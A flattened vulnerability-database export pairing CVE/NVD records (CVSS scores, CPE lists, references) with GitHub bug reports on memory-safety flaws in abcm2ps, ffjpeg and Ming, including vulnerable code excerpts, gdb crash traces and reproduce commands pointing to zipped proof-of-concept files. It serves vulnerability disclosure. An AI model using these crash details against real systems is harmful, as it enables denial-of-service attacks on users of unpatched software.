[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/2f56e1179cab6affeb8afa9d6c324008fe40d8e3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/issues/83" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00015.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6333SXWMES3K22DBAOAW34G6EU6WIJEY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EVGJH4HMXI3TWMHQJQCG3M7KSXJWJM7R/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTF4FXCW22FFB5HNQO3GK3F4FFBLTZKE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/2f56e1179cab6affeb8afa9d6c324008fe40d8e3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/issues/83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00015.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6333SXWMES3K22DBAOAW34G6EU6WIJEY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EVGJH4HMXI3TWMHQJQCG3M7KSXJWJM7R/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTF4FXCW22FFB5HNQO3GK3F4FFBLTZKE/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:abcm2ps_project:abcm2ps:8.14.11:*:*:*:*:*:*:*", "matchCriteriaId": "F1915B5A-15EE-4267-9DBE-0827CA3F709E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/leesavide/abcm2ps/issues/83
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "leesavide", "abcm2ps" ]
Version 0cf4a55 In function calculate_beam() in draw.c . There is out of bounds read in array min_tb at line 357 and 359, the flaw will cause crash. ``` if (s->nhd == 0) stem_err = min_tb[0][(unsigned) s->nflags]; else stem_err = min_tb[1][(unsigned) s->nflags]; ``` The (unsigned) s->nflags can be checked whether between 0 and 5. I am not sure what the `stem_err` means so i didn't try to fix it. gdb info: ``` ──── source:draw.c+357 ──── 352 } 353 x = s->voice == voice ? s->xs : s->x; 354 ys = a * x + b - staff_tb[s->staff].y; 355 if (s->voice == voice) { 356 if (s->nhd == 0) // s=0x00007fffffffdff8 → [...] → 0x0000555555625d28, nflags=0x1, min_tb=0x00005555555ce640 → 0x4180000041800000 → 357 stem_err = min_tb[0][(unsigned) s->nflags]; 358 else 359 stem_err = min_tb[1][(unsigned) s->nflags]; 360 if (s->stem > 0) { 361 if (s->pits[s->nhd] > 26) { 362 stem_err -= 2; ── trace ──── [#0] 0x555555570417 → calculate_beam(bm=0x7fffffffe050, s1=0x555555622618) [#1] 0x55555557c659 → draw_sym_near() [#2] 0x55555559542a → delayed_output(indent=0) [#3] 0x55555559562d → output_music() [#4] 0x555555597aeb → generate() [#5] 0x555555597c2e → gen_ly(eob=0x0) [#6] 0x55555559eca1 → do_tune() [#7] 0x55555555e300 → abc_parse(p=0x55555561e0e0 "", fname=0x5555555fab00 ".poc", ln=0x1b) [#8] 0x555555584b9e → txt_add_eos(fname=0x5555555fab00 ".poc", linenum=0x1b) [#9] 0x555555585d81 → frontend(s=0x55555561d1a5 "X:X:\027\nC", '.' <repeats 14 times>, "mid\n\\:`\n\177\377\062~c .", ftype=0x0, f ──── gef➤ p (unsigned) s->nflags $1 = 0xfffffffe gef➤ p min_tb[0][(unsigned) s->nflags] Cannot access memory at address 0x5559555ce638 ``` reproduce: ``` abcm2ps -E [poc] ``` [out-of-bounds-read_calculate_beam_357.zip](https://github.com/leesavide/abcm2ps/files/6381411/out-of-bounds-read_calculate_beam_357.zip) [out-of-bounds-read_calculate_beam_359.zip](https://github.com/leesavide/abcm2ps/files/6381412/out-of-bounds-read_calculate_beam_359.zip) reporter: chiba of topsec alphalab
Out-of-bounds read in draw.c in calculate_beam
https://api.github.com/repos/lewdlime/abcm2ps/issues/83/comments
0
2021-04-27T02:14:17Z
2022-03-11T05:28:52Z
https://github.com/lewdlime/abcm2ps/issues/83
868,374,057
83
3,310
CVE-2021-32435
2022-03-10T17:42:14.457
Stack-based buffer overflow in the function get_key in parse.c of abcm2ps v8.14.11 allows remote attackers to cause a Denial of Service (DoS) via unspecified vectors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/3169ace6d63f6f517a64e8df0298f44a490c4a15" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/issues/84" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00015.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6333SXWMES3K22DBAOAW34G6EU6WIJEY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EVGJH4HMXI3TWMHQJQCG3M7KSXJWJM7R/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTF4FXCW22FFB5HNQO3GK3F4FFBLTZKE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/3169ace6d63f6f517a64e8df0298f44a490c4a15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/issues/84" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00015.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6333SXWMES3K22DBAOAW34G6EU6WIJEY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EVGJH4HMXI3TWMHQJQCG3M7KSXJWJM7R/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTF4FXCW22FFB5HNQO3GK3F4FFBLTZKE/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:abcm2ps_project:abcm2ps:8.14.11:*:*:*:*:*:*:*", "matchCriteriaId": "F1915B5A-15EE-4267-9DBE-0827CA3F709E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/leesavide/abcm2ps/issues/84
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "leesavide", "abcm2ps" ]
Version 0cf4a55 Stack buffer over found in parse.c in function get_key(). The root cause maybe is in function c_set_k_acc(), the array `accs` and `pits` size is 8. If `s->u.key.sf` bigger than 7 , then the array `accs` and `pits` will access out of index and corrupt the stack, if the value of `s->u.key.sf` is more bigger, then the stack frame will be corrupted. ``` static void set_k_acc(struct SYMBOL *s) { int i, j, nacc; char accs[8], pits[8]; ... if (s->u.key.sf > 0) { for (nacc = 0; nacc < s->u.key.sf; nacc++) { accs[nacc] = A_SH; pits[nacc] = sharp_tb[nacc]; } } ``` gdb ``` gef➤ disassemble set_k_acc Dump of assembler code for function set_k_acc: 0x000055555559f74c <+0>: endbr64 0x000055555559f750 <+4>: push rbp 0x000055555559f751 <+5>: mov rbp,rsp 0x000055555559f754 <+8>: sub rsp,0x40 0x000055555559f758 <+12>: mov QWORD PTR [rbp-0x38],rdi ... 0x55555559f941 <set_k_acc+501> mov rax, QWORD PTR [rbp-0x8] → 0x55555559f945 <set_k_acc+505> xor rax, QWORD PTR fs:0x28 0x55555559f94e <[buffer-over-flow_parse.c_set_k_acc.zip](https://github.com/leesavide/abcm2ps/files/6381703/buffer-over-flow_parse.c_set_k_acc.zip)+514> je 0x55555559f955 <set_k_acc+521> 0x55555559f950 <set_k_acc+516> call 0x55555555ba40 <__stack_chk_fail@plt> 0x55555559f955 <set_k_acc+521> leave ─ source:parse.c+3943 ──── 3938 for (i = 0; i < nacc; i++) { 3939 s->u.key.accs[i] = accs[i]; 3940 s->u.key.pits[i] = pits[i]; 3941 } ● 3942 s->u.key.nacc = nacc; → 3943 } gef➤ x/gx $rbp-0x8 0x7fffffffe038: 0x0101010101010101 ``` reproduce : abcm2ps -E poc [buffer-over-flow_parse.c_set_k_acc.zip](https://github.com/leesavide/abcm2ps/files/6381704/buffer-over-flow_parse.c_set_k_acc.zip) reporter : chiba of topsec alphalab
stack buffer overflow in function get_key() in parse.c
https://api.github.com/repos/lewdlime/abcm2ps/issues/84/comments
0
2021-04-27T03:41:52Z
2022-03-11T05:31:24Z
https://github.com/lewdlime/abcm2ps/issues/84
868,424,804
84
3,311
CVE-2021-32436
2022-03-10T17:42:14.683
An out-of-bounds read in the function write_title() in subs.c of abcm2ps v8.14.11 allows remote attackers to cause a Denial of Service (DoS) via unspecified vectors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/2f56e1179cab6affeb8afa9d6c324008fe40d8e3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/issues/85" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00015.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6333SXWMES3K22DBAOAW34G6EU6WIJEY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EVGJH4HMXI3TWMHQJQCG3M7KSXJWJM7R/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTF4FXCW22FFB5HNQO3GK3F4FFBLTZKE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/2f56e1179cab6affeb8afa9d6c324008fe40d8e3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/issues/85" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00015.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6333SXWMES3K22DBAOAW34G6EU6WIJEY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EVGJH4HMXI3TWMHQJQCG3M7KSXJWJM7R/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTF4FXCW22FFB5HNQO3GK3F4FFBLTZKE/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:abcm2ps_project:abcm2ps:8.14.11:*:*:*:*:*:*:*", "matchCriteriaId": "F1915B5A-15EE-4267-9DBE-0827CA3F709E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/leesavide/abcm2ps/issues/85
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "leesavide", "abcm2ps" ]
In Version 0cf4a55 Out-of-bounds read found in function write_title() in subs.c. The flow allows attackers to cause denial of service. Here didn't check whether `&s->text[2]` is valid . gdb info: ``` ─── source:subs.c+1465 ──── 1460 void write_title(struct SYMBOL *s) 1461 { 1462 char *p; 1463 float sz; 1464 // s=0x00007fffffffe008 → 0x0000000000433a4b ("K:C"?), p=0x00007fffffffe018 → [...] → 0x3a4d14736d616542 → 1465 p = &s->text[2]; 1466 if (*p == '\0') 1467 return; 1468 if (s == info['T' - 'A']) { 1469 sz = cfmt.font_tb[TITLEFONT].size; 1470 bskip(cfmt.titlespace + sz); ── threads ──── [#0] Id 1, Name: "abcm2ps", stopped 0x5555555aaad3 in write_title (), reason: SIGSEGV ───── trace ──── [#0] 0x5555555aaad3 → write_title(s=0x433a4b) [#1] 0x5555555abc2f → write_heading() [#2] 0x55555559cd23 → get_info(s=0x5555556205c0) [#3] 0x55555559e658 → do_tune() [#4] 0x55555555e300 → abc_parse(p=0x55555561e0e0 "", fname=0x5555555fab00 "afl-collect-epsf/s1:id:002115,sig:11,src:019963,time:101664885,op:havoc,rep:4", ln=0x38) [#5] 0x555555584b9e → txt_add_eos(fname=0x5555555fab00 "afl-collect-epsf/s1:id:002115,sig:11,src:019963,time:101664885,op:havoc,rep:4", linenum=0x38) [#6] 0x555555585d6e → frontend(s=0x55555561d2b3 "X:1\nT:Beams\024M:C\nK:C\n;\n&[\322-n", 'E' <repeats 11 times>, "\377EEEEEE\n&[B-nEK:\n&[DC\016KX: ?-c,C\275@:\n&[B-nK:\n&)))))))) X:1", ftype=0x0, fname=0x5555555fab00 "afl-collect-epsf/s1:id:002115,sig:11,src:019963,time:101664885,op:havoc,rep:4", linenum=0x38) [#7] 0x55555555c4ba → treat_file(fn=0x7fffffffe6a4 "afl-collect-epsf/s1:id:002115,sig:11,src:019963,time:101664885,op:havoc,rep:4", ext=0x5555555ba0a6 "abc") [#8] 0x55555555c5ae → treat_abc_file(fn=0x7fffffffe6a4 "afl-collect-epsf/s1:id:002115,sig:11,src:019963,time:101664885,op:havoc,rep:4") [#9] 0x55555555dc03 → main(argc=0x0, argv=0x7fffffffe420) ─── gef➤ p &s $1 = (struct SYMBOL **) 0x7fffffffe008 gef➤ p &s->text $2 = (char **) 0x433b03 gef➤ p &s->text[2] Cannot access memory at address 0x433b03 ``` reproduce : (poc zipped ) ``` unzip [poc].zip abcm2ps -E [poc] ``` [out-of-bounds-read_subs.c+1465_write_title.zip](https://github.com/leesavide/abcm2ps/files/6382871/out-of-bounds-read_subs.c%2B1465_write_title.zip) reporter: chiba of topsec alphalab
out-of-bounds read in function write_title() in subs.c
https://api.github.com/repos/lewdlime/abcm2ps/issues/85/comments
4
2021-04-27T07:57:56Z
2022-03-11T05:35:08Z
https://github.com/lewdlime/abcm2ps/issues/85
868,574,361
85
3,312
CVE-2021-34122
2022-03-10T17:42:36.623
The function bitstr_tell at bitstr.c in ffjpeg commit 4ab404e has a NULL pointer dereference.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/36" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/pull/37" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/pull/37" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "B275DEF0-B89A-4794-8276-E4BF906BBB00", "versionEndExcluding": "2021-03-16", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/rockcarry/ffjpeg/issues/36
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
Hi, There is null pointer dereference in function bitstr_tell() and bitstr_close() in bitstr.c. Didn't check whether the stream is valid . ``` long bitstr_tell(void *stream) { int type = *(int*)stream; if (!stream) return EOF; ... } int bitstr_close(void *stream) { int type = *(int*)stream; ... } ``` **version** 4ab404e (latest one) **env** ubuntu 20.04 x86_64 gcc version 9.3.0 **reproduce:** make ./ffjpeg -e poc [zipped poc](https://github.com/rockcarry/ffjpeg/files/6471461/null_pointer_bitstr_tell.zip) **debug info ** ``` ─── code:x86:64 ──── 0x555555555a57 <bitstr_tell+8> sub rsp, 0x20 0x555555555a5b <bitstr_tell+12> mov QWORD PTR [rbp-0x18], rdi 0x555555555a5f <bitstr_tell+16> mov rax, QWORD PTR [rbp-0x18] → 0x555555555a63 <bitstr_tell+20> mov eax, DWORD PTR [rax] 0x555555555a65 <bitstr_tell+22> mov DWORD PTR [rbp-0x4], eax 0x555555555a68 <bitstr_tell+25> cmp QWORD PTR [rbp-0x18], 0x0 0x555555555a6d <bitstr_tell+30> jne 0x555555555a78 <bitstr_tell+41> 0x555555555a6f <bitstr_tell+32> mov rax, 0xffffffffffffffff 0x555555555a76 <bitstr_tell+39> jmp 0x555555555aa9 <bitstr_tell+90> ── threads ──── [#0] Id 1, Name: "ffjpeg-ggdb", stopped 0x555555555a63 in bitstr_tell (), reason: SINGLE STEP ─ trace ──── [#0] 0x555555555a63 → bitstr_tell(stream=0x0) [#1] 0x55555555b866 → jfif_encode(pb=0x7fffffffe290) [#2] 0x5555555574f6 → main() ──── gef➤ i r rax rax 0x0 0x0 ```
null pointer dereference in function bitstr_tell() in bitstr.c
https://api.github.com/repos/rockcarry/ffjpeg/issues/36/comments
4
2021-05-13T09:08:27Z
2021-05-17T05:51:39Z
https://github.com/rockcarry/ffjpeg/issues/36
890,871,244
36
3,313
CVE-2021-34338
2022-03-10T17:42:36.847
Ming 0.4.8 has an out-of-bounds buffer overwrite issue in the function getName() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969616" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/201" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969616" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/201" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/libming/libming/issues/201
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
